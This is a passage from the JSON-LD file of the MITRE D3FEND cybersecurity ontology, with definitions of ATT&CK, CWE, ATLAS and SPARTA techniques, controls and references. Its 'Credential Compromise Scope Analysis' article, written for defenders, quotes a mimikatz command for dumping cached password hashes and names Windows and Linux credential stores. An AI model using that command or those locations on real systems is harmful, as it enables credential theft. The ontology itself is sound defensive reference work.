      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExternalContentInclusionFunction"
      }
    },
    {
      "@id": "d3f:T1109",
      "@type": "owl:Class",
      "d3f:attack-id": "T1109",
      "d3f:definition": "Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1019) but conducted upon other system components that may not have the same capability or level of integrity checking. Malicious device firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1542.002",
      "rdfs:label": "Component Firmware",
      "rdfs:seeAlso": {
        "@id": "d3f:T1542.002"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        }
      ]
    },
    {
      "@id": "d3f:ControlFlowPolicy",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A control flow policy is a subset of the possible control flow transfers computed from a program's control flow graph. It defines only the expected and allowed control flow transfers and is enforced by control flow integrity.",
      "rdfs:label": "Control Flow Policy",
      "rdfs:subClassOf": {
        "@id": "d3f:ControlFlowGraph"
      }
    },
    {
      "@id": "d3f:may-be-hardened-against-by",
      "@type": "owl:ObjectProperty",
      "d3f:pref-label": "may be hardened against by",
      "owl:inverseOf": {
        "@id": "d3f:may-harden"
      },
      "rdfs:label": "may-be-hardened-against-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:attack-may-be-countered-by"
      }
    },
    {
      "@id": "d3f:CWE-831",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-831",
      "d3f:definition": "The product defines a function that is used as a handler for more than one signal.",
      "rdfs:label": "Signal Handler Function Associated with Multiple Signals",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-364"
      }
    },
    {
      "@id": "d3f:T1569.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1569.002",
      "d3f:definition": "Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and [Net](https://attack.mitre.org/software/S0039).",
      "rdfs:label": "Service Execution",
      "rdfs:subClassOf": {
        "@id": "d3f:T1569"
      }
    },
    {
      "@id": "d3f:CWE-323",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-323",
      "d3f:definition": "Nonces should be used for the present occasion and only once.",
      "rdfs:label": "Reusing a Nonce, Key Pair in Encryption",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-344"
      }
    },
    {
      "@id": "d3f:BayesianModelAveraging",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-BMA",
      "d3f:definition": "A parameter estimate (or a prediction of new observations) obtained by averaging the estimates (or predictions) of the different models under consideration, each weighted by its model probability.",
      "d3f:kb-article": "## References\nEnsemble learning. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Ensemble_learning).\n\nBayesian model average: A parameter estimation approach to model agnostic ensemble learning. (2019). Journal of Machine Learning for Modeling and Computing, 1(2), 61-70.  [Link](https://journals.sagepub.com/doi/full/10.1177/2515245919898657#:~:text=Bayesian%20model%20average%3A%20A%20parameter,weighted%20by%20its%20model%20probability).",
      "rdfs:label": "Bayesian Model Averaging",
      "rdfs:subClassOf": {
        "@id": "d3f:EnsembleLearning"
      }
    },
    {
      "@id": "d3f:LinuxConnect",
      "@type": "owl:Class",
      "d3f:definition": "Initiate a connection on a socket.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/connect.2.html"
      },
      "rdfs:label": "Linux Connect",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIConnectSocket"
      }
    },
    {
      "@id": "d3f:T1583.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1583.003",
      "d3f:definition": "Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.",
      "rdfs:label": "Virtual Private Server",
      "rdfs:subClassOf": {
        "@id": "d3f:T1583"
      }
    },
    {
      "@id": "d3f:AML.T0031",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0031",
      "d3f:definition": "Adversaries may degrade the target model's performance with adversarial data inputs to erode confidence in the system over time.\nThis can lead to the victim organization wasting time and money both attempting to fix the system and performing the tasks it was meant to automate by hand.",
      "rdfs:label": "Erode AI Model Integrity - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0031"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASImpactTechnique"
      },
      "skos:prefLabel": "Erode AI Model Integrity"
    },
    {
      "@id": "d3f:CWE-8",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-8",
      "d3f:definition": "When an application exposes a remote interface for an entity bean, it might also expose methods that get or set the bean's data. These methods could be leveraged to read sensitive information, or to change data in ways that violate the application's expectations, potentially leading to other vulnerabilities.",
      "rdfs:label": "J2EE Misconfiguration: Entity Bean Declared Remote",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:SoftwareRepository",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:SoftwarePackage"
      },
      "d3f:definition": "A software repository, or repo for short, is a storage location for software packages. Often a table of contents is also stored, along with metadata. A software repository is typically managed by source or version control, or repository managers. Package managers allow automatically installing and updating repositories, sometimes called 'packages'.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Software_repository"
      },
      "rdfs:label": "Software Repository",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Repository"
        },
        {
          "@id": "_:N8a0d8026656b4e519ea2e2dd72728afb"
        }
      ],
      "skos:altLabel": "Package Repository"
    },
    {
      "@id": "_:N8a0d8026656b4e519ea2e2dd72728afb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SoftwarePackage"
      }
    },
    {
      "@id": "d3f:Reference-Munin",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SourceCodeReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://github.com/Neo23x0/munin"
      },
      "d3f:kb-author": "Florian Roth",
      "d3f:kb-reference-title": "Online Hash Checker for Virustotal and Other Services",
      "rdfs:label": "Reference - Munin"
    },
    {
      "@id": "d3f:d3fend-data-property",
      "@type": "owl:DatatypeProperty",
      "rdfs:label": "d3fend-data-property"
    },
    {
      "@id": "d3f:KeyboardInputDevice",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A computer keyboard is a typewriter-style device which uses an arrangement of buttons or keys to act as mechanical levers or electronic switches. Following the decline of punch cards and paper tape, interaction via teleprinter-style keyboards became the main input method for computers. A keyboard is also used to give commands to the operating system of a computer, such as Windows' Control-Alt-Delete combination. Although on Pre-Windows 95 Microsoft operating systems this forced a re-boot, now it brings up a system security options screen.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Computer_keyboard"
      },
      "rdfs:label": "Keyboard Input Device",
      "rdfs:subClassOf": {
        "@id": "d3f:InputDevice"
      },
      "skos:altLabel": [
        "Computer Keyboard",
        "Keyboard"
      ]
    },
    {
      "@id": "d3f:T1219.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1219.002",
      "d3f:definition": "An adversary may use legitimate desktop support software to establish an interactive command and control channel to target systems within networks. Desktop support software provides a graphical interface for remotely controlling another computer, transmitting the display output, keyboard input, and mouse control between devices using various protocols. Desktop support software, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.(Citation: Symantec Living off the Land)(Citation: CrowdStrike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSpy)",
      "rdfs:label": "Remote Desktop Software",
      "rdfs:subClassOf": {
        "@id": "d3f:T1219"
      }
    },
    {
      "@id": "d3f:KioskComputer",
      "@type": "owl:Class",
      "d3f:definition": "An interactive kiosk is a computer terminal featuring specialized hardware and software that provides access to information and applications for communication, commerce, entertainment, or education. Early interactive kiosks sometimes resembled telephone booths, but have been embraced by retail, food service and hospitality to improve customer service and streamline operations. Interactive kiosks are typically placed in high foot traffic settings such as shops, hotel lobbies or airports.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Interactive_kiosk"
      },
      "rdfs:label": "Kiosk Computer",
      "rdfs:subClassOf": {
        "@id": "d3f:SharedComputer"
      },
      "skos:altLabel": "Interactive Kiosk"
    },
    {
      "@id": "d3f:CWE-564",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-564",
      "d3f:definition": "Using Hibernate to execute a dynamic SQL statement built with user-controlled input can allow an attacker to modify the statement's meaning or to execute arbitrary SQL commands.",
      "rdfs:label": "SQL Injection: Hibernate",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-89"
      }
    },
    {
      "@id": "d3f:AcademicPaperReference",
      "@type": "owl:Class",
      "d3f:pref-label": "Academic Paper",
      "rdfs:label": "Academic Paper Reference",
      "rdfs:subClassOf": {
        "@id": "d3f:TechniqueReference"
      }
    },
    {
      "@id": "d3f:ATTACKEnterpriseTechnique",
      "@type": "owl:Class",
      "rdfs:label": "ATTACK Enterprise Technique",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKEnterpriseThing"
      }
    },
    {
      "@id": "d3f:T1596.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1596.002",
      "d3f:definition": "Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)",
      "rdfs:label": "WHOIS",
      "rdfs:subClassOf": {
        "@id": "d3f:T1596"
      }
    },
    {
      "@id": "d3f:EX-0018.03",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0018.03",
      "d3f:definition": "High-powered microwave (HPM) weapons can be used to disrupt or destroy a satellite’s electronics. A “front-door” HPM attack uses a satellite’s own antennas as an entry path, while a “back-door” attack attempts to enter through small seams or gaps around electrical connections and shielding. A front-door attack is more straightforward to carry out, provided the HPM is positioned within the field of view of the antenna that it is using as a pathway, but it can be thwarted if the satellite uses circuits designed to detect and block surges of energy entering through the antenna. In contrast, a back-door attack is more challenging, because it must exploit design or manufacturing flaws, but it can be conducted from many angles relative to the satellite. Both types of attacks can be either reversible or irreversible; however, the attacker may not be able to control the severity of the damage from the attack. Both front-door and back-door HPM attacks can be difficult to attribute to an attacker, and like a laser weapon, the attacker may not know if the attack has been successful. A HPM attack may leave the target satellite disabled and uncontrollable which can cause it to drift into other satellites, creating further collateral damage.*\n\n*https://aerospace.csis.org/aerospace101/counterspace-weapons-101",
      "rdfs:label": "High-Powered Microwave - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0018/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0018"
      },
      "skos:prefLabel": "High-Powered Microwave"
    },
    {
      "@id": "d3f:IA-0006",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0006",
      "d3f:definition": "Adversaries target hosted payloads as an alternate doorway into the host spacecraft. Hosted payloads often expose their own command sets, file services, and telemetry paths, sometimes via the host’s TT&C chain, sometimes through a parallel ground infrastructure under different operational control. Initial access arises when an attacker obtains the ability to issue payload commands, upload files, or alter memory/register state on the hosted unit. Because data and control must traverse an interface to the host bus (power, time, housekeeping, data routing, gateway processors), the payload–host boundary can also carry management functions: mode transitions, table loads, firmware updates, and cross-strapped links that appear only in maintenance or contingency modes. With knowledge of the interface specification and command dictionaries, a threat actor can activate rarely used modes, inject crafted data products, or trigger gateway behaviors that extend influence beyond the payload itself. In multi-tenant or commercial hosting arrangements, differences in keying, procedures, or scheduling between the payload operator and the bus operator provide additional opportunity for a first foothold that looks like routine payload commanding.",
      "rdfs:label": "Compromise Hosted Payload - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0006/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAInitialAccessTechnique"
      },
      "skos:prefLabel": "Compromise Hosted Payload"
    },
    {
      "@id": "d3f:CCI-000197_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, for password-based authentication, transmits only cryptographically-protected passwords.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:StrongPasswordPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-15T00:00:00"
      },
      "rdfs:label": "CCI-000197"
    },
    {
      "@id": "d3f:T1216.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1216.001",
      "d3f:definition": "Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via <code>Cscript.exe</code>. For example, the following code publishes a printer within the specified domain: <code>cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com</code>.(Citation: pubprn)",
      "rdfs:label": "PubPrn",
      "rdfs:subClassOf": {
        "@id": "d3f:T1216"
      }
    },
    {
      "@id": "d3f:T1427",
      "@type": "owl:Class",
      "d3f:attack-id": "T1427",
      "d3f:definition": "With escalated privileges, an adversary could program the mobile device to impersonate USB devices such as input devices (keyboard and mouse), storage devices, and/or networking devices in order to attack a physically connected PC(Citation: Wang-ExploitingUSB)(Citation: ArsTechnica-PoisonTap) This technique has been demonstrated on Android. We are unaware of any demonstrations on iOS.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Attack PC via USB Connection - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileLateralMovementTechnique"
      },
      "skos:prefLabel": "Attack PC via USB Connection"
    },
    {
      "@id": "d3f:WirelessAttacker",
      "@type": "owl:Class",
      "d3f:definition": "An attacker who targets wireless communication methods, like Wi-Fi, without needing physical access to the premises.",
      "rdfs:label": "Wireless Attacker",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:RemoteAttacker"
        },
        {
          "@id": "_:N605081f99729441a8146f0b374ce14e6"
        },
        {
          "@id": "_:Nc232b2659d82426bb34a39c62552c56e"
        },
        {
          "@id": "_:Neb23d3ac571e4d7baa3d81f9eb03f5d6"
        }
      ]
    },
    {
      "@id": "_:N605081f99729441a8146f0b374ce14e6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalLink"
      }
    },
    {
      "@id": "_:Nc232b2659d82426bb34a39c62552c56e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WirelessAccessPoint"
      }
    },
    {
      "@id": "_:Neb23d3ac571e4d7baa3d81f9eb03f5d6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WirelessRouter"
      }
    },
    {
      "@id": "d3f:CCI-002420_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system maintains the confidentiality and/or integrity of information during preparation for transmission.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:EncryptedTunnels"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002420"
    },
    {
      "@id": "d3f:OTProcessDataCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Manage data associated with a controlled process.",
      "rdfs:label": "OT Process Data Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTEvent"
        },
        {
          "@id": "_:N8450c216625447c88b7c4fe0468c2714"
        }
      ]
    },
    {
      "@id": "_:N8450c216625447c88b7c4fe0468c2714",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTProcessDataCommand"
      }
    },
    {
      "@id": "d3f:Reference-ARadiationHardenedSARADCWithDelayBasedDualFeedbackFlipFlopsForSensorReadoutSystems",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.mdpi.com/1424-8220/20/1/171"
      },
      "d3f:kb-abstract": "For stable and effective control of the sensor system, analog sensor signals such as temperature, pressure, and electromagnetic fields should be accurately measured and converted to digital bits. However, radiation environments, such as space, flight, nuclear power plants, and nuclear fusion reactors, as well as high-reliability applications, such as automotive semiconductor systems, suffer from radiation effects that degrade the performance of the sensor readout system including analog-to-digital converters (ADCs) and cause system malfunctions. This paper investigates an optimal ADC structure in radiation environments and proposes a successive- approximation-register (SAR) ADC using delay-based double feedback flip-flops to enhance the system tolerance against radiation effects, including total ionizing dose (TID) and single event effects (SEE). The proposed flip-flop was fabricated using 130 nm complementary metal-oxide-semiconductor (CMOS) silicon-on-insulator (SOI) process, and its radiation tolerance was measured in actual radiation test facilities. Also, the proposed radiation-hardened SAR ADC with delay-based dual feedback flip-flops was designed and verified by utilizing compact transistor models, which reflect radiation effects to CMOS parameters, and radiation simulator computer aided design (CAD) tools.",
      "d3f:kb-author": "Duckhoon Ro, Changhong Min, Myounggon Kang, Hyung-Min Lee",
      "d3f:kb-reference-of": {
        "@id": "d3f:RadiationHardening"
      },
      "d3f:kb-reference-title": "A Radiation-Hardened SAR ADC with Delay-Based Dual Feedback Flip-Flops for Sensor Readout Systems",
      "rdfs:label": "Reference - A Radiation-Hardened SAR ADC with Delay-Based Dual Feedback Flip-Flops for Sensor Readout Systems"
    },
    {
      "@id": "d3f:T1417",
      "@type": "owl:Class",
      "d3f:attack-id": "T1417",
      "d3f:definition": "Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal device usage, users often provide credentials to various locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Keylogging](https://attack.mitre.org/techniques/T1417/001)) or rely on deceiving the user into providing input into what they believe to be a genuine application prompt (e.g. [GUI Input Capture](https://attack.mitre.org/techniques/T1417/002)).",
      "rdfs:label": "Input Capture - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileCollectionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileCredentialAccessTechnique"
        }
      ],
      "skos:prefLabel": "Input Capture"
    },
    {
      "@id": "d3f:T1523",
      "@type": "owl:Class",
      "d3f:attack-id": "T1523",
      "d3f:definition": "Malicious applications may attempt to detect their operating environment prior to fully executing their payloads. These checks are often used to ensure the application is not running within an analysis environment such as a sandbox used for application vetting, security research, or reverse engineering.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1633.001",
      "rdfs:label": "Evade Analysis Environment - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1633.001"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileDiscoveryTechnique"
        }
      ],
      "skos:prefLabel": "Evade Analysis Environment"
    },
    {
      "@id": "d3f:T1053.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1053.004",
      "d3f:creates": {
        "@id": "d3f:PropertyListFile"
      },
      "d3f:definition": "This technique is deprecated due to the inaccurate usage. The report cited did not provide technical detail as to how the malware interacted directly with launchd rather than going through known services. Other system services are used to interact with launchd rather than launchd being used by itself.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique is deprecated due to the inaccurate usage. The report cited did not provide technical detail as to how the malware interacted directly with launchd rather than going through known services. Other system services are used to interact with launchd rather than launchd being used by itself.",
      "rdfs:label": "Launchd",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1053"
        },
        {
          "@id": "_:Nfad525e0388b44b482cd304279c54532"
        }
      ]
    },
    {
      "@id": "_:Nfad525e0388b44b482cd304279c54532",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PropertyListFile"
      }
    },
    {
      "@id": "d3f:step-1",
      "@type": "owl:NamedIndividual",
      "d3f:invokes": {
        "@id": "d3f:CopyToken"
      },
      "d3f:next": {
        "@id": "d3f:step-2"
      },
      "rdfs:label": "Step 1 - Copy Token"
    },
    {
      "@id": "d3f:CredentialCompromiseScopeAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:CredentialCompromiseScopeAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:Credential"
      },
      "d3f:d3fend-id": "D3-CCSA",
      "d3f:definition": "Determining which credentials may have been compromised by analyzing the user logon history of a particular system.",
      "d3f:kb-article": "## How it works\n\n#### Memory\nCredentials may be stored in memory for a variety of reasons; on Windows, they may be stored in lsass.exe.  Once a credential dumper like mimikatz runs and dumps the memory of lsass.exe, the credentials of every account logged on since boot are potentially compromised.\nWhen such an event occurs, this analytic will give the forensic context to identify compromised users. Those users could potentially be used in later events for additional logons.\n\n\n#### Hard disk\nOperating System may cache a certain number of credentials onto the hard disk to use as a source of truth if it cannot contact the credential server.  In many versions of Microsoft Windows, the 10 most recent are cached by default; this setting can be changed in the Microsoft Management Console's Local Security Policy: ```Computer Configuration -> Windows Settings -> Local Policy -> Security Options -> Interactive Logon: Number of previous logons to cache -> 0```  Here we are not concerned with the alteration of the credentials but the fact that they might be read.  If the attacker has physical access to the machine they are unlikely to be stopped from reading files on the filesystem.\n\"In the event that the domain controller is unavailable Windows will check the last password hashes that has been cached in order to authenticate the user with the system. These password hashes are cached in the following registry setting:\nHKEY_LOCAL_MACHINE\\SECURITY\\Cache\nMimikatz can retrieve these hashes if the following command is executed:\nlsadump::cache\" [1]\n\nThe Registry Hive, HKEY_LOCAL_MACHINE\\SAM, which is stored in the supporting files %systemroot%\\System32\\Config\\{Sam,sam.log,sam.sav}, contains the SAM file.\n\nDC: This is stored in %systemroot%\\ntds\\ntds.dit. (https://www.ultimatewindowssecurity.com/blog/default.aspx?d=10/2017)\n\nSometimes memory, which contains credentials, could get on the hard disk. Like with hiberfil.sys in Windows.  Equivalent on Linux\n\n\nIn Linux, an attacker could read the /etc/shadow file.\n\nReading from /proc directory: mimipenguin, many others.\n\n## Considerations\nEffective implementation requires identifying any location that could end up containing credentials, and detecting an method of potential access to a source of credential data.\n\n1. https://medium.com/blue-team/preventing-mimikatz-attacks-ed283e7ebdd5",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-AllLoginsSinceLastBoot_MITRE"
        },
        {
          "@id": "d3f:Reference-SystemsAndMethodsForDetectingCredentialTheft_SymantecCorp"
        }
      ],
      "rdfs:label": "Credential Compromise Scope Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserBehaviorAnalysis"
        },
        {
          "@id": "_:N0f8a107e821d4ce086c4044a7c854d1d"
        }
      ]
    },
    {
      "@id": "_:N0f8a107e821d4ce086c4044a7c854d1d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:LocalAreaNetworkAttacker",
      "@type": "owl:Class",
      "d3f:definition": "An attacker who exploits vulnerabilities within the same local area network.",
      "d3f:synonym": "LAN Attacker",
      "rdfs:label": "Local Area Network Attacker",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:LocalAttacker"
        },
        {
          "@id": "_:Nc79145487beb477fa186359cd57c728c"
        }
      ]
    },
    {
      "@id": "_:Nc79145487beb477fa186359cd57c728c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LocalAreaNetwork"
      }
    },
    {
      "@id": "d3f:injects",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x injects y: The subject x takes the action of exploiting a security flaw by introducing (injecting) y, which is code or data that will change the course of execution or state of a computing process to an alternate course or state. Typically code injection is associated with adversaries intending the alternate course to facilitate a malevolent purpose; however, code injection can be unintentional or the intentions behind it may be good or benign.",
      "rdfs:label": "injects",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Code_injection"
        },
        {
          "@id": "http://wordnet-rdf.princeton.edu/id/00916722-v"
        }
      ],
      "rdfs:subPropertyOf": {
        "@id": "d3f:executes"
      }
    },
    {
      "@id": "d3f:DiscoveryTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The adversary is trying to figure out your environment.",
      "d3f:enables": {
        "@id": "d3f:TA0007"
      },
      "rdfs:label": "Discovery Technique",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTechnique"
        },
        {
          "@id": "d3f:OffensiveTechnique"
        },
        {
          "@id": "_:N45ce1a6139be45948390dc0dbd71607c"
        }
      ]
    },
    {
      "@id": "_:N45ce1a6139be45948390dc0dbd71607c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0007"
      }
    },
    {
      "@id": "d3f:CWE-628",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-628",
      "d3f:definition": "The product calls a function, procedure, or routine with arguments that are not correctly specified, leading to always-incorrect behavior and resultant weaknesses.",
      "rdfs:label": "Function Call with Incorrectly Specified Arguments",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-573"
      }
    },
    {
      "@id": "d3f:PER-0004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:adds": {
        "@id": "d3f:CryptographicKey"
      },
      "d3f:attack-id": "PER-0004",
      "d3f:definition": "The adversary cements control by changing the cryptographic material the spacecraft uses to authenticate or protect links and updates. Targets include uplink authentication keys and counters, link-encryption/session keys and key-encryption keys (KEKs), key identifiers/selectors, and algorithm profiles. Using authorized rekey commands or key-loading procedures, often designed for over-the-air use, the attacker installs new values in non-volatile storage and updates selectors so subsequent traffic must use the attacker’s keys to be accepted. Variants desynchronize anti-replay by advancing counters or switching epochs, or strand operators by flipping profiles to a mode for which only the adversary holds parameters. Once replaced, the new material persists across resets and mode changes, turning the spacecraft into a node that recognizes the adversary’s channel while rejecting former controllers.",
      "rdfs:label": "Replace Cryptographic Keys - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/PER-0004/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTAPersistenceTechnique"
        },
        {
          "@id": "_:N31f0b4a340f34c48b469464e7fd22647"
        }
      ],
      "skos:prefLabel": "Replace Cryptographic Keys"
    },
    {
      "@id": "_:N31f0b4a340f34c48b469464e7fd22647",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:adds"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CryptographicKey"
      }
    },
    {
      "@id": "d3f:SystemUtilizationRecord",
      "@type": "owl:Class",
      "d3f:definition": "A system utilization record is a record for the tracking of resource utilization e.g. CPU, Disk, Network, Memory Bandwidth, GPU, or other resources for a given time period.",
      "rdfs:label": "System Utilization Record",
      "rdfs:subClassOf": {
        "@id": "d3f:Record"
      }
    },
    {
      "@id": "d3f:DHCPRequestEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a DHCP client sends a REQUEST message to confirm or renew its desired IP configuration with a specific DHCP server.",
      "rdfs:label": "DHCP Request Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DHCPEvent"
        },
        {
          "@id": "_:N8ba95a4c9fcd4a458e0c1b9dd5bdffaa"
        }
      ],
      "skos:altLabel": "DHCPREQUEST"
    },
    {
      "@id": "_:N8ba95a4c9fcd4a458e0c1b9dd5bdffaa",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DHCPOfferEvent"
      }
    },
    {
      "@id": "d3f:UserProfile",
      "@type": "owl:Class",
      "d3f:definition": "A user profile is a collection of settings and information associated with a user. It contains critical information that is used to identify an individual, such as their name, age, portrait photograph and individual characteristics such as knowledge or expertise.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:User_profile"
      },
      "rdfs:label": "User Profile",
      "rdfs:seeAlso": {
        "@id": "https://en.wikipedia.org/wiki/User_profile"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:AccessPolicyAdministration",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
